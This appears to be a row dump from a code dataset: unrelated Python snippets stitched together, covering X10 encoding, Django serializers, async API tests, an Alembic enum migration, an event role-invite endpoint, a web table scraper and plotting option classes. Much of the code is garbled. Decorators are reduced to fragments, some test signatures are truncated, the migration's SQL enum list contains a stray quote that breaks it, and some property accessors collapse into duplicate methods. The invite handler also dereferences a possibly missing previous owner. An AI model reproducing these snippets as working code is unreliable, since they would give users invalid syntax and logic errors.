code stringlengths 281 23.7M |
|---|
def gen_x10(targ_house, targ_unit, targ_cmd):
res = [0, 0]
if _debug:
print(targ_house, targ_unit, targ_cmd, file=sys.stderr)
res[0] = houseCodes[targ_house]
if (targ_unit and (not (cmd_code[targ_cmd] & 128))):
res[0] |= ((unit_code[targ_unit] >> 8) & 255)
res[1] |= (unit_code[targ_unit] & 255)
res[1] |= (cmd_code[targ_cmd] & 255)
if _debug:
print(f'{res[0]:08b} {(res[0] ^ 255):08b} {res[1]:08b} {(res[1] ^ 255):08b}', file=sys.stderr)
return f'{res[0]:08b}{(res[0] ^ 255):08b}{res[1]:08b}{(res[1] ^ 255):08b}' |
class TreeNodeAdminTestCase(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def assertStaticFile(self, path):
result = finders.find(path)
self.assertTrue((result is not None))
def test_staticfiles(self):
if ('treenode' not in settings.INSTALLED_APPS):
return
self.assertStaticFile('treenode/css/treenode.css')
self.assertStaticFile('treenode/js/treenode.js') |
def validateExamples(examples, schemas, maxExamples, shuffle):
failures = []
numberOfSuccessfulValidations = 0
unchecked = []
numChecked = 0
latestReportTime = time.perf_counter()
if shuffle:
random.shuffle(examples)
for (path, type, version, id, event) in examples:
schemaKey = ((type + '-') + version)
if (schemaKey in schemas):
try:
validate(event, schemas[schemaKey])
numberOfSuccessfulValidations += 1
except Exception as e:
failures.append((path, type, id, e))
else:
unchecked.append((path, type, id, event))
numChecked += 1
if ((maxExamples > 0) and (numChecked >= maxExamples)):
print((('Reached limit of ' + str(maxExamples)) + ' examples to validate. Breaking.'))
break
if ((time.perf_counter() - latestReportTime) > 5):
print((((('Checked ' + str(numChecked)) + ' / ') + str(len(examples))) + ' examples.'), flush=True)
latestReportTime = time.perf_counter()
return (failures, unchecked, numberOfSuccessfulValidations) |
(config_path='../cfgs/', config_name='default_test')
def test_fn(cfg: DictConfig):
OmegaConf.set_struct(cfg, False)
accelerator = Accelerator(even_batches=False, device_placement=False)
accelerator.print('Model Config:', OmegaConf.to_yaml(cfg), accelerator.state)
torch.backends.cudnn.benchmark = (cfg.test.cudnnbenchmark if (not cfg.debug) else False)
if cfg.debug:
accelerator.print('DEBUG MODE')
torch.backends.cudnn.deterministic = True
set_seed_and_print(cfg.seed)
model = instantiate(cfg.MODEL, _recursive_=False)
model = model.to(accelerator.device)
model = accelerator.prepare(model)
if cfg.test.resume_ckpt:
checkpoint = torch.load(cfg.test.resume_ckpt)
try:
model.load_state_dict(prefix_with_module(checkpoint), strict=True)
except:
model.load_state_dict(checkpoint, strict=True)
accelerator.print(f'Successfully resumed from {cfg.test.resume_ckpt}')
categories = cfg.test.category
if ('seen' in categories):
categories = TRAINING_CATEGORIES
if ('unseen' in categories):
categories = TEST_CATEGORIES
if ('debug' in categories):
categories = DEBUG_CATEGORIES
if ('all' in categories):
categories = (TRAINING_CATEGORIES + TEST_CATEGORIES)
categories = sorted(categories)
print(('-' * 100))
print(f'Testing on {categories}')
print(('-' * 100))
category_dict = {}
metric_name = ['Auc_30', 'Racc_5', 'Racc_15', 'Racc_30', 'Tacc_5', 'Tacc_15', 'Tacc_30']
for m_name in metric_name:
category_dict[m_name] = {}
for category in categories:
print(('-' * 100))
print(f'Category {category} Start')
error_dict = _test_one_category(model=model, category=category, cfg=cfg, num_frames=cfg.test.num_frames, random_order=cfg.test.random_order, accelerator=accelerator)
rError = np.array(error_dict['rError'])
tError = np.array(error_dict['tError'])
category_dict['Racc_5'][category] = (np.mean((rError < 5)) * 100)
category_dict['Racc_15'][category] = (np.mean((rError < 15)) * 100)
category_dict['Racc_30'][category] = (np.mean((rError < 30)) * 100)
category_dict['Tacc_5'][category] = (np.mean((tError < 5)) * 100)
category_dict['Tacc_15'][category] = (np.mean((tError < 15)) * 100)
category_dict['Tacc_30'][category] = (np.mean((tError < 30)) * 100)
Auc_30 = calculate_auc_np(rError, tError, max_threshold=30)
category_dict['Auc_30'][category] = (Auc_30 * 100)
print(('-' * 100))
print(f'Category {category} Done')
for m_name in metric_name:
category_dict[m_name]['mean'] = np.mean(list(category_dict[m_name].values()))
for c_name in (categories + ['mean']):
print_str = f'{c_name.ljust(20)}: '
for m_name in metric_name:
print_num = np.mean(category_dict[m_name][c_name])
print_str = (print_str + f'{m_name} is {print_num:.3f} | ')
if (c_name == 'mean'):
print(('-' * 100))
print(print_str)
return True |
class ModelSerializer(Serializer):
_options_class = ModelSerializerOptions
field_mapping = {models.AutoField: IntegerField, models.FloatField: FloatField, models.IntegerField: IntegerField, models.PositiveIntegerField: IntegerField, models.SmallIntegerField: IntegerField, models.PositiveSmallIntegerField: IntegerField, models.DateTimeField: DateTimeField, models.DateField: DateField, models.TimeField: TimeField, models.DecimalField: DecimalField, models.EmailField: EmailField, models.CharField: CharField, models.URLField: URLField, models.SlugField: SlugField, models.TextField: CharField, models.CommaSeparatedIntegerField: CharField, models.BooleanField: BooleanField, models.NullBooleanField: BooleanField, models.FileField: FileField, models.ImageField: ImageField}
def get_default_fields(self):
cls = self.opts.model
assert (cls is not None), ("Serializer class '%s' is missing 'model' Meta option" % self.__class__.__name__)
opts = cls._meta.concrete_model._meta
ret = OrderedDict()
nested = bool(self.opts.depth)
pk_field = opts.pk
while (pk_field.rel and pk_field.rel.parent_link):
pk_field = pk_field.rel.to._meta.pk
serializer_pk_field = self.get_pk_field(pk_field)
if serializer_pk_field:
ret[pk_field.name] = serializer_pk_field
forward_rels = [field for field in opts.fields if field.serialize]
forward_rels += [field for field in opts.many_to_many if field.serialize]
for model_field in forward_rels:
has_through_model = False
if model_field.rel:
to_many = isinstance(model_field, models.fields.related.ManyToManyField)
related_model = _resolve_model(model_field.rel.to)
if (to_many and (not model_field.rel.through._meta.auto_created)):
has_through_model = True
if (model_field.rel and nested):
field = self.get_nested_field(model_field, related_model, to_many)
elif model_field.rel:
field = self.get_related_field(model_field, related_model, to_many)
else:
field = self.get_field(model_field)
if field:
if has_through_model:
field.read_only = True
ret[model_field.name] = field
if (not self.opts.fields):
reverse_rels = []
else:
reverse_rels = opts.get_all_related_objects()
reverse_rels += opts.get_all_related_many_to_many_objects()
for relation in reverse_rels:
accessor_name = relation.get_accessor_name()
if ((not self.opts.fields) or (accessor_name not in self.opts.fields)):
continue
related_model = relation.model
to_many = relation.field.rel.multiple
has_through_model = False
is_m2m = isinstance(relation.field, models.fields.related.ManyToManyField)
if (is_m2m and hasattr(relation.field.rel, 'through') and (not relation.field.rel.through._meta.auto_created)):
has_through_model = True
if nested:
field = self.get_nested_field(None, related_model, to_many)
else:
field = self.get_related_field(None, related_model, to_many)
if field:
if has_through_model:
field.read_only = True
ret[accessor_name] = field
assert isinstance(self.opts.read_only_fields, (list, tuple)), '`read_only_fields` must be a list or tuple'
for field_name in self.opts.read_only_fields:
assert (field_name not in self.base_fields.keys()), ("field '%s' on serializer '%s' specified in `read_only_fields`, but also added as an explicit field. Remove it from `read_only_fields`." % (field_name, self.__class__.__name__))
assert (field_name in ret), ("Non-existent field '%s' specified in `read_only_fields` on serializer '%s'." % (field_name, self.__class__.__name__))
ret[field_name].read_only = True
assert isinstance(self.opts.write_only_fields, (list, tuple)), '`write_only_fields` must be a list or tuple'
for field_name in self.opts.write_only_fields:
assert (field_name not in self.base_fields.keys()), ("field '%s' on serializer '%s' specified in `write_only_fields`, but also added as an explicit field. Remove it from `write_only_fields`." % (field_name, self.__class__.__name__))
assert (field_name in ret), ("Non-existent field '%s' specified in `write_only_fields` on serializer '%s'." % (field_name, self.__class__.__name__))
ret[field_name].write_only = True
return ret
def get_pk_field(self, model_field):
return self.get_field(model_field)
def get_nested_field(self, model_field, related_model, to_many):
class NestedModelSerializer(ModelSerializer):
class Meta():
model = related_model
depth = (self.opts.depth - 1)
return NestedModelSerializer(many=to_many)
def get_related_field(self, model_field, related_model, to_many):
kwargs = {'queryset': related_model._default_manager, 'many': to_many}
if model_field:
kwargs['required'] = ((not (model_field.null or model_field.blank)) and model_field.editable)
if (model_field.help_text is not None):
kwargs['help_text'] = model_field.help_text
if (model_field.verbose_name is not None):
kwargs['label'] = model_field.verbose_name
if (not model_field.editable):
kwargs['read_only'] = True
if (model_field.verbose_name is not None):
kwargs['label'] = model_field.verbose_name
if (model_field.help_text is not None):
kwargs['help_text'] = model_field.help_text
return PrimaryKeyRelatedField(**kwargs)
def get_field(self, model_field):
kwargs = {}
if (model_field.null or (model_field.blank and model_field.editable)):
kwargs['required'] = False
if (isinstance(model_field, models.AutoField) or (not model_field.editable)):
kwargs['read_only'] = True
if model_field.has_default():
kwargs['default'] = model_field.get_default()
if issubclass(model_field.__class__, models.TextField):
kwargs['widget'] = widgets.Textarea
if (model_field.verbose_name is not None):
kwargs['label'] = model_field.verbose_name
if (model_field.help_text is not None):
kwargs['help_text'] = model_field.help_text
if model_field.flatchoices:
kwargs['choices'] = model_field.flatchoices
if model_field.null:
kwargs['empty'] = None
return ChoiceField(**kwargs)
if (issubclass(model_field.__class__, models.PositiveIntegerField) or issubclass(model_field.__class__, models.PositiveSmallIntegerField)):
kwargs['min_value'] = 0
if (model_field.null and issubclass(model_field.__class__, (models.CharField, models.TextField))):
kwargs['allow_none'] = True
attribute_dict = {models.CharField: ['max_length'], models.CommaSeparatedIntegerField: ['max_length'], models.DecimalField: ['max_digits', 'decimal_places'], models.EmailField: ['max_length'], models.FileField: ['max_length'], models.ImageField: ['max_length'], models.SlugField: ['max_length'], models.URLField: ['max_length']}
attributes = _get_class_mapping(attribute_dict, model_field)
if attributes:
for attribute in attributes:
kwargs.update({attribute: getattr(model_field, attribute)})
serializer_field_class = _get_class_mapping(self.field_mapping, model_field)
if serializer_field_class:
return serializer_field_class(**kwargs)
return ModelField(model_field=model_field, **kwargs)
def get_validation_exclusions(self, instance=None):
cls = self.opts.model
opts = cls._meta.concrete_model._meta
exclusions = [field.name for field in (opts.fields + opts.many_to_many)]
for (field_name, field) in self.fields.items():
field_name = (field.source or field_name)
if ((field_name in exclusions) and (not field.read_only) and (field.required or hasattr(instance, field_name)) and (not isinstance(field, Serializer))):
exclusions.remove(field_name)
return exclusions
def full_clean(self, instance):
try:
instance.full_clean(exclude=self.get_validation_exclusions(instance))
except ValidationError as err:
self._errors = err.message_dict
return None
return instance
def restore_object(self, attrs, instance=None):
m2m_data = {}
related_data = {}
nested_forward_relations = {}
meta = self.opts.model._meta
for (obj, model) in meta.get_all_related_objects_with_model():
field_name = obj.get_accessor_name()
if (field_name in attrs):
related_data[field_name] = attrs.pop(field_name)
for (obj, model) in meta.get_all_related_m2m_objects_with_model():
field_name = obj.get_accessor_name()
if (field_name in attrs):
m2m_data[field_name] = attrs.pop(field_name)
if issubclass(meta.many_to_many.__class__, tuple):
temp_m2m = list(meta.many_to_many)
else:
temp_m2m = meta.many_to_many
for field in (temp_m2m + meta.virtual_fields):
if isinstance(field, GenericForeignKey):
continue
if (field.name in attrs):
m2m_data[field.name] = attrs.pop(field.name)
for field_name in attrs.keys():
if isinstance(self.fields.get(field_name, None), Serializer):
nested_forward_relations[field_name] = attrs[field_name]
if (instance is None):
instance = self.opts.model()
for (key, val) in attrs.items():
try:
setattr(instance, key, val)
except ValueError:
self._errors[key] = [self.error_messages['required']]
instance._related_data = related_data
instance._m2m_data = m2m_data
instance._nested_forward_relations = nested_forward_relations
return instance
def from_native(self, data, files=None):
instance = super(ModelSerializer, self).from_native(data, files=files)
if (not self._errors):
return self.full_clean(instance)
def save_object(self, obj, **kwargs):
if getattr(obj, '_nested_forward_relations', None):
for (field_name, sub_object) in obj._nested_forward_relations.items():
if sub_object:
self.save_object(sub_object)
setattr(obj, field_name, sub_object)
obj.save(**kwargs)
if getattr(obj, '_m2m_data', None):
for (accessor_name, object_list) in obj._m2m_data.items():
setattr(obj, accessor_name, object_list)
del obj._m2m_data
if getattr(obj, '_related_data', None):
related_fields = dict([(field.get_accessor_name(), field) for (field, model) in obj._meta.get_all_related_objects_with_model()])
for (accessor_name, related) in obj._related_data.items():
if isinstance(related, RelationsList):
for related_item in related:
fk_field = related_fields[accessor_name].field.name
setattr(related_item, fk_field, obj)
self.save_object(related_item)
if related._deleted:
[self.delete_object(item) for item in related._deleted]
elif isinstance(related, models.Model):
fk_field = obj._meta.get_field_by_name(accessor_name)[0].field.name
setattr(related, fk_field, obj)
self.save_object(related)
else:
setattr(obj, accessor_name, related)
del obj._related_data |
class InputText(JsHtml.JsHtmlRich):
def isEmpty(self, js_funcs: types.JS_FUNCS_TYPES):
if (not isinstance(js_funcs, list)):
js_funcs = [js_funcs]
return JsIf.JsIf(('%s === ""' % self.component.dom.content.toStr()), js_funcs)
def hasLength(self, n: int, js_funcs: types.JS_FUNCS_TYPES):
if (not isinstance(js_funcs, list)):
js_funcs = [js_funcs]
return JsIf.JsIf(('%s.length >= %s' % (self.component.dom.content.toStr(), n)), js_funcs)
def if_(self, rule: str, js_funcs: types.JS_FUNCS_TYPES):
if (not isinstance(js_funcs, list)):
js_funcs = [js_funcs]
return JsIf.JsIf(rule, js_funcs)
('jqueryui', 'jqueryui')
def autocomplete(self, values: list, options: dict=None):
if (self.component.attr['type'] != 'text'):
raise ValueError('Autocomplete can only be used with input text components')
values = JsUtils.jsConvertData(values, None)
options = (options or {})
return JsUtils.jsWrap(('\n%s.autocomplete(Object.assign({source: %s}, %s))\n' % (JsQuery.decorate_var(self.varId, convert_var=False), values, options))) |
def upgrade():
op.execute('alter type connectiontype rename to connectiontype_old')
op.execute("create type connectiontype as enum('postgres', 'mongodb', 'mysql', ' 'snowflake', 'redshift', 'mssql', 'mariadb', 'bigquery', 'saas', 'manual', 'manual_webhook', 'timescale', 'fides', 'sovrn', 'attentive', 'dynamodb')")
op.execute('alter table connectionconfig alter column connection_type type connectiontype using connection_type::text::connectiontype')
op.execute('drop type connectiontype_old') |
def only_wire(tile1, tile2, tiles, x_wires, y_wires):
tile1_info = tiles[tile1]
tile2_info = tiles[tile2]
tile1_x = tile1_info['grid_x']
tile2_x = tile2_info['grid_x']
tiles_x_adjacent = (abs((tile1_x - tile2_x)) == 1)
if (tiles_x_adjacent and (len(x_wires[tile1_x]) == 1) and (len(x_wires[tile2_x]) == 1)):
return True
tile1_y = tile1_info['grid_y']
tile2_y = tile2_info['grid_y']
tiles_y_adjacent = (abs((tile1_y - tile2_y)) == 1)
if (tiles_y_adjacent and (len(y_wires[tile1_y]) == 1) and (len(y_wires[tile2_y]) == 1)):
return True
return None |
class Waters():
def make_molsetup_OPC():
raise NotImplementedError
rdmol = Chem.MolFromSmiles('O')
conformer = Chem.Conformer(rdmol.GetNumAtoms())
conformer.SetAtomPosition(0, Point3D(0, 0, 0))
rdmol.AddConformer(conformer)
molsetup = RDKitMoleculeSetup(rdmol)
return molsetup
def make_molsetup_TIP3P_AA():
rdmol = Chem.MolFromSmiles('O')
rdmol = Chem.AddHs(rdmol)
conformer = Chem.Conformer(rdmol.GetNumAtoms())
dist_oh = 0.9572
ang_hoh = np.radians(104.52)
conformer.SetAtomPosition(0, Point3D(0, 0, 0))
conformer.SetAtomPosition(1, Point3D(dist_oh, 0, 0))
conformer.SetAtomPosition(2, Point3D((np.cos(ang_hoh) * dist_oh), (np.sin(ang_hoh) * dist_oh), 0))
rdmol.AddConformer(conformer)
molsetup = RDKitMoleculeSetup(rdmol)
molsetup.bond[(0, 1)]['rotatable'] = False
molsetup.bond[(0, 2)]['rotatable'] = False
molsetup.atom_type[0] = 'n-tip3p-O'
molsetup.atom_type[1] = 'n-tip3p-H'
molsetup.atom_type[2] = 'n-tip3p-H'
molsetup.charge[0] = (- 0.834)
molsetup.charge[1] = 0.417
molsetup.charge[2] = 0.417
return molsetup |
class Game():
def __init__(self, platform: Platforms, region: Regions, title: str, nsuid: str=None, product_code: str=None):
self.platform: Platforms = platform
self.region: Regions = region
self.title: str = title
self.nsuid: str = nsuid
self.product_code: str = product_code
self.description: Optional[str] = None
self.slug: Optional[str] = None
self.players: int = 0
self.free_to_play: Optional[bool] = None
self.release_date: Optional[datetime] = None
self.categories: List[str] = []
self.developers: List[str] = []
self.languages: List[str] = []
self.publishers: List[str] = []
self.rating: Optional[Tuple[(Ratings, Any)]] = None
self.features: Dict[(Features, Any)] = {}
def unique_id(self) -> Optional[str]:
if (not self.product_code):
return None
if (self.region == Regions.JP):
return self.product_code[3:(- 1)]
else:
return self.product_code[4:(- 1)]
def eshop(self) -> Union[(NAeShop, EUeShop, JPeShop)]:
return ESHOPS[self.region](self)
def price(self, country: str) -> Price:
return get_price(country=country, game=self)
def __repr__(self):
return self.title |
.asyncio
.workspace_host
class TestDeleteRole():
async def test_unauthorized(self, unauthorized_api_assertions: HTTPXResponseAssertion, test_client_api: test_data: TestData):
role = test_data['roles']['castles_visitor']
response = (await test_client_api.delete(f'/roles/{role.id}'))
unauthorized_api_assertions(response)
.authenticated_admin
async def test_not_existing(self, test_client_api: not_existing_uuid: uuid.UUID):
response = (await test_client_api.delete(f'/roles/{not_existing_uuid}'))
assert (response.status_code == status.HTTP_404_NOT_FOUND)
.authenticated_admin
async def test_valid(self, test_client_api: test_data: TestData, workspace_session: AsyncSession):
role = test_data['roles']['castles_visitor']
response = (await test_client_api.delete(f'/roles/{role.id}'))
assert (response.status_code == status.HTTP_204_NO_CONTENT)
user = test_data['users']['regular']
user_permission_repository = UserPermissionRepository(workspace_session)
user_permissions = (await user_permission_repository.list(user_permission_repository.get_by_user_statement(user.id)))
assert (len(user_permissions) == 1) |
class State():
def __init__(self, i3):
self.context: Optional[Context] = None
self.workspace_sequences: Dict[(str, WorkspaceSequence)] = {}
self.rebuild_action = RebuildAction()
self.old_workspace_name = ''
self.sync_context(i3)
for workspace in i3.get_workspaces():
if workspace.focused:
self.add_workspace_sequence(workspace.name)
self.prev_workspace_name = workspace.name
def sync_context(self, i3l: Connection) -> Context:
tree = i3l.get_tree()
focused = tree.find_focused()
workspace = focused.workspace()
workspace_sequence = self.get_workspace_sequence(workspace.name)
self.context = Context(i3l, tree, workspace_sequence)
return self.context
def handle_rebuild(self, context: Context, container: Con):
if (self.rebuild_action.rebuild_cause is None):
self.end_rebuild(context, RebuildCause.WINDOW_NEW)
elif (len(self.rebuild_action.containers_to_recreate) == 0):
self.end_rebuild(context)
else:
if (self.rebuild_action.container_id_to_focus is None):
self.rebuild_action.container_id_to_focus = container.id
self.rebuild_action.next_rebuild(context)
def start_rebuild(self, rebuild_cause: RebuildCause, context: Context, main_mark: str, last_mark: str, con_id: int=0):
logger.debug(f'[state] rebuilding for {rebuild_cause}')
self.rebuild_action.start_rebuild(context, rebuild_cause, main_mark, last_mark, con_id)
def rebuild_closed_container(self, window_id: int) -> bool:
if (window_id in self.rebuild_action.containers_to_close):
self.rebuild_action.containers_to_close.remove(window_id)
return True
return False
def end_rebuild(self, context: Context, cause: RebuildCause=None):
self.rebuild_action.end_rebuild(context, cause)
def is_last_container_rebuilt(self, container: Con):
return ((self.rebuild_action.last_container_rebuilt is not None) and (self.rebuild_action.last_container_rebuilt.window == container.window))
def get_workspace_sequence(self, workspace_name: str) -> Optional[WorkspaceSequence]:
return (self.workspace_sequences[workspace_name] if (workspace_name in self.workspace_sequences) else None)
def add_workspace_sequence(self, workspace_name: str) -> WorkspaceSequence:
if (workspace_name not in self.workspace_sequences):
workspace_sequence = WorkspaceSequence()
self.workspace_sequences[workspace_name] = workspace_sequence
if (self.context.workspace.name == workspace_name):
for container in self.context.containers:
if (not self.workspace_sequences[workspace_name].contains(container.id)):
self.workspace_sequences[workspace_name].set_order(container)
self.workspace_sequences[workspace_name].set_stale(True)
self.context.workspace_sequence = self.workspace_sequences[workspace_name]
return self.workspace_sequences[workspace_name] |
def callback_query(args: str, payload=True):
async def func(ftl, __, query: CallbackQuery):
if payload:
thing = '{}\\_'
if re.search(re.compile(thing.format(ftl.data)), query.data):
search = re.search(re.compile('\\_{1}(.*)'), query.data)
if search:
query.payload = search.group(1)
else:
query.payload = None
return True
return False
else:
if (ftl.data == query.data):
return True
return False
return create(func, 'CustomCallbackQuery', data=args) |
class For_Loop_Statement(Compound_Statement):
def __init__(self, t_for):
super().__init__()
assert isinstance(t_for, MATLAB_Token)
assert ((t_for.kind == 'KEYWORD') and (t_for.value in ('for', 'parfor')))
self.t_for = t_for
self.t_for.set_ast(self)
self.n_ident = None
self.n_body = None
def loc(self):
return self.t_for.location
def set_ident(self, n_ident):
assert isinstance(n_ident, Identifier)
self.n_ident = n_ident
self.n_ident.set_parent(self)
def set_body(self, n_body):
assert isinstance(n_body, Sequence_Of_Statements)
self.n_body = n_body
self.n_body.set_parent(self)
def visit(self, parent, function, relation):
raise ICE('reached visit procedure for abstract base class for for-loops') |
class OptionSeriesWordcloudSonificationContexttracksMappingRate(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def test_when_field_can_be_merged_with_casts():
cfg = ControlFlowGraph()
r32 = [Variable('reg', unsigned_int, i) for i in range(10)]
r64 = [Variable('reg', unsigned_long, i) for i in range(10)]
int_var = Variable('int_var', signed_int, 0)
char_var = Variable('char_var', signed_char, 0)
instructions = [Assignment(r64[1], cast(unsigned_long, cast(unsigned_int, r64[0]))), Branch(Condition(OperationType.less_or_equal, [contract(unsigned_int, cast(unsigned_long, int_var)), Constant(4)])), Branch(Condition(OperationType.less_or_equal, [contract(unsigned_char, cast(unsigned_long, int_var)), Constant(4)])), Branch(Condition(OperationType.less_or_equal, [contract(unsigned_char, cast(unsigned_long, cast(unsigned_int, char_var))), Constant(64)])), Branch(Condition(OperationType.less_or_equal, [contract(unsigned_int, cast(unsigned_long, cast(unsigned_char, int_var))), Constant(64)]))]
cfg.add_node(BasicBlock(0, instructions))
RedundantCastsElimination().run(DecompilerTask('test', cfg))
assert ([i for i in cfg.instructions] == [Assignment(r64[1], cast(unsigned_int, r64[0])), Branch(Condition(OperationType.less_or_equal, [int_var, Constant(4)])), Branch(Condition(OperationType.less_or_equal, [cast(unsigned_char, int_var), Constant(4)])), Branch(Condition(OperationType.less_or_equal, [char_var, Constant(64)])), Branch(Condition(OperationType.less_or_equal, [cast(unsigned_int, cast(unsigned_char, int_var)), Constant(64)]))]) |
_invites_misc_routes.route('/role_invites/accept-invite', methods=['POST'])
def accept_invite():
token = request.json['data']['token']
try:
role_invite = RoleInvite.query.filter_by(hash=token).one()
except NoResultFound:
raise NotFoundError({'source': ''}, 'Role Invite Not Found')
else:
try:
user = User.query.filter_by(email=role_invite.email).first()
except NoResultFound:
raise NotFoundError({'source': ''}, 'User corresponding to role invite not Found')
try:
role = Role.query.filter_by(name=role_invite.role_name).first()
except NoResultFound:
raise NotFoundError({'source': ''}, 'Role corresponding to role invite not Found')
event = Event.query.filter_by(id=role_invite.event_id).first()
uer = UsersEventsRoles.query.filter_by(user=user).filter_by(event=event).filter_by(role=role).first()
if (not uer):
if (role_invite.role_name == 'owner'):
past_owner = UsersEventsRoles.query.filter_by(event=event, role=role).first()
oldrole = Role.query.filter_by(name='organizer').first()
prevuser = User.query.filter_by(id=past_owner.user_id).first()
if past_owner:
delete_previous_uer(past_owner)
puer = UsersEventsRoles(user=prevuser, event=event, role=oldrole)
save_to_db(puer, 'User Event Role changed')
role_invite.status = 'accepted'
save_to_db(role_invite, 'Role Invite Accepted')
event.group_id = None
save_to_db(event, 'Group ID Removed')
uer = UsersEventsRoles(user=user, event=event, role=role)
save_to_db(uer, 'User Event Role Created')
if (not user.is_verified):
user.is_verified = True
save_to_db(user, 'User verified')
return jsonify({'email': user.email, 'event': role_invite.event_id, 'event_identifier': role_invite.event.identifier, 'name': (user.fullname if user.fullname else None), 'role': uer.role.name}) |
def Check_DeleteConfigWrite(proc, stmts):
assert (len(stmts) > 0)
ctxt = ContextExtraction(proc, stmts)
p = ctxt.get_control_predicate()
G = ctxt.get_pre_globenv()
ap = ctxt.get_posteffs()
a = G(stmts_effs(stmts))
stmtsG = globenv(stmts)
slv = SMTSolver(verbose=False)
slv.push()
a = [E.Guard(AMay(p), a)]
(WrG, Mod) = getsets([ES.WRITE_G, ES.MODIFY], a)
(WrGp, RdGp) = getsets([ES.WRITE_G, ES.READ_G], ap)
only_mod_glob = ADef(is_empty(LDiff(Mod, WrG)))
is_ok = slv.verify(only_mod_glob)
if (not is_ok):
slv.pop()
raise SchedulingError(f'Cannot delete or insert statements at {stmts[0].srcinfo} because they may modify non-configuration data')
def is_cfg_unmod_by_stmts(pt):
pt_e = A.Var(pt.name, pt.typ, null_srcinfo())
cfg_unchanged = ADef(G(AEq(pt_e, stmtsG(pt_e))))
return slv.verify(cfg_unchanged)
cfg_mod = {pt.name: pt for pt in get_point_exprs(WrG) if (not is_cfg_unmod_by_stmts(pt))}
cfg_mod_visible = set()
for (_, pt) in cfg_mod.items():
pt_e = A.Var(pt.name, pt.typ, null_srcinfo())
is_written = is_elem(pt, WrG)
is_unchanged = G(AEq(pt_e, stmtsG(pt_e)))
is_read_post = is_elem(pt, RdGp)
is_overwritten = is_elem(pt, WrGp)
safe_write = AImplies(AMay(is_read_post), ADef(is_unchanged))
if (not slv.verify(safe_write)):
slv.pop()
raise SchedulingError(f'Cannot change configuration value of {pt.name} at {stmts[0].srcinfo}; the new (and different) values might be read later in this procedure')
invisible = ADef(AOr(is_unchanged, is_overwritten))
if (not slv.verify(invisible)):
cfg_mod_visible.add(pt.name)
slv.pop()
return cfg_mod_visible |
def recognize_ngram(tokens: List[str], gazetteer: Dict[(str, Set[str])]) -> List[Tuple[(int, int, str, Set[str])]]:
entities = []
for i in range(len(tokens)):
for j in range((i + 1), (len(tokens) + 1)):
key = ' '.join(tokens[i:j])
val = gazetteer.get(key, None)
if val:
entities.append((i, j, key, val))
return entities |
def extractCreamSavers(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
if ('WATTT' in item['tags']):
return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix)
return False |
class AttributeHandler():
_attrcreate = 'attrcreate'
_attredit = 'attredit'
_attrread = 'attrread'
_attrtype = None
def __init__(self, obj, backend_class):
self.obj = obj
self.backend = backend_class(self, self._attrtype)
def has(self, key=None, category=None):
ret = []
category = (category.strip().lower() if (category is not None) else None)
for keystr in make_iter(key):
keystr = key.strip().lower()
ret.extend((bool(attr) for attr in self.backend.get(keystr, category)))
return (ret[0] if (len(ret) == 1) else ret)
def get(self, key=None, default=None, category=None, return_obj=False, strattr=False, raise_exception=False, accessing_obj=None, default_access=True, return_list=False):
ret = []
for keystr in make_iter(key):
attr_objs = self.backend.get(keystr, category)
if attr_objs:
ret.extend(attr_objs)
elif raise_exception:
raise AttributeError
elif return_obj:
ret.append(None)
if accessing_obj:
ret = [attr for attr in ret if attr.access(accessing_obj, self._attrread, default=default_access)]
if strattr:
ret = (ret if return_obj else [attr.strvalue for attr in ret if attr])
else:
ret = (ret if return_obj else [attr.value for attr in ret if attr])
if return_list:
return (ret if ret else ([default] if (default is not None) else []))
return (ret[0] if (ret and (len(ret) == 1)) else (ret or default))
def add(self, key, value, category=None, lockstring='', strattr=False, accessing_obj=None, default_access=True):
if (accessing_obj and (not self.obj.access(accessing_obj, self._attrcreate, default=default_access))):
return
if (not key):
return
category = (category.strip().lower() if (category is not None) else None)
keystr = key.strip().lower()
attr_obj = self.backend.get(key, category)
if attr_obj:
attr_obj = attr_obj[0]
self.backend.update_attribute(attr_obj, value, strattr)
else:
self.backend.create_attribute(keystr, category, lockstring, value, strattr)
def batch_add(self, *args, **kwargs):
self.backend.batch_add(*args, **kwargs)
def remove(self, key=None, category=None, raise_exception=False, accessing_obj=None, default_access=True):
if (key is None):
self.clear(category=category, accessing_obj=accessing_obj, default_access=default_access)
return
category = (category.strip().lower() if (category is not None) else None)
for keystr in make_iter(key):
keystr = keystr.lower()
attr_objs = self.backend.get(keystr, category)
for attr_obj in attr_objs:
if (not (accessing_obj and (not attr_obj.access(accessing_obj, self._attredit, default=default_access)))):
self.backend.delete_attribute(attr_obj)
if ((not attr_objs) and raise_exception):
raise AttributeError
def clear(self, category=None, accessing_obj=None, default_access=True):
self.backend.clear_attributes(category, accessing_obj, default_access)
def all(self, category=None, accessing_obj=None, default_access=True):
attrs = self.backend.get_all_attributes()
if category:
attrs = [attr for attr in attrs if (attr.category == category)]
if accessing_obj:
return [attr for attr in attrs if attr.access(accessing_obj, self._attrread, default=default_access)]
else:
return attrs
def reset_cache(self):
self.backend.reset_cache() |
def parse_link(link):
namespace = link.split('/')[(- 2)]
print('Parsing {} link: {}'.format(namespace, link))
response = requests.get((base_url + link))
table_attr = SoupStrainer('table')
soup = BeautifulSoup(response.content, 'lxml', parse_only=table_attr)
table = soup.find('table')
if (not table):
return {}
rows = table.findAll('tr')
header = [data.text.lower() for data in rows[0].findAll('th')]
object_name = os.path.basename(os.path.normpath(link))
object_info = defaultdict(dict)
object_info[object_name] = defaultdict(dict)
for row in rows[1:]:
columns = [data.text for data in row.findAll('td')]
row_data = dict(zip(header, columns))
name = row_data.pop('name', None)
if name:
object_info[object_name][name].update(row_data)
print(('Parsing Completed for: ' + link))
return (namespace, object_info) |
class OptionPlotoptionsSeriesSonificationTracks(Options):
def activeWhen(self) -> 'OptionPlotoptionsSeriesSonificationTracksActivewhen':
return self._config_sub_data('activeWhen', OptionPlotoptionsSeriesSonificationTracksActivewhen)
def instrument(self):
return self._config_get('piano')
def instrument(self, text: str):
self._config(text, js_type=False)
